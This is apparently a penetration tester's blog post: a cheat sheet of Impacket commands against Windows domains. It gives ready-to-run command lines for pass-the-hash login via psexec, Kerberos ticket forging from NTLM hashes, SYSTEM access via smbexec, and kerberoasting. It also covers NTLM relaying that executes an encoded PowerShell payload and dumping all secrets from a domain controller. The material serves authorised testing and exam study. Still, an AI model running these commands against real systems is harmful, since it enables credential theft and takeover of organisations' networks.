Practical Impacket

Practical Impacket

This blog post document practical uses of impacket’s scripts that we have used in engagements, exams and during research.

Impacket (https://github.com/SecureAuthCorp/impacket) is a brilliant collection of python scripts developed by SecureAuth used to work with network protocols and Windows. The scripts are incredibly versatile and make a pentester’s life much easier. It would be safe to say that we are fans of the tool.

Below are some examples of using impacket’s scripts in various ways. For this post, we have Impacket packaged into Kali Linux, syntax might be different if you have cloned the repository manually.

Login to a domain joined Windows computer with NTLM hash

impacket-psexec -no-pass -hashes :e48c13cefd8f9456d79cd49651c134e8 domain/user@10.10.10.10

Get kerberos ticket for a user with NTLM hash

impacket-getTGT -hashes :2ae7b18071bd6a1e405e6b51390918e4 domain/user -dc-ip 10.10.10.2

Login to domain computer with kerberos ticket

impacket-psexec -no-pass -k domain/user -dc-ip 10.10.10.2 -target-ip 10.10.10.5

Connect to smb share using kerberos ticket

impacket-smbclient "user@domain" -k -no-pass -target-ip 10.10.10.5 -dc-ip 10.10.10.2

Login to domain computer with smb creds to get SYSTEM (where psexec is disallowed)

impacket-smbexec Domain/User:Password@targetip

Get Active Directory users from Domain Controller with kerberos ticket authentication

impacket-GetADUsers -all -k -no-pass -dc-ip 10.10.10.2 domain.com/user

Get kerberoastable domain accounts from domain controller with credentials

impacket-GetUserSPNs -request -dc-ip 10.10.10.2 domain/user -outputfile hashes.kerberoast

Connect to MS SQL database server with credentials

impacket-mssqlclient user:password@10.10.10.6 -port 1433 -windows-auth

Relay Net-NTLM hashes from Responder to targets and run powershell

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.8 - 
c 'powershell -enc  KABOAGUAdwAtAE8AYgBqA...ARQBYAA=='

Convert ccache kerberos ticket to kirbi format

impacket-ticketConverter krb5cc_1394201122_MerMmG jking.kirbi

Extract all secrets from a domain controller

impacket-secretsdump domain/user:password@10.10.10.2

Leave a Reply

Your email address will not be published. Required fields are marked *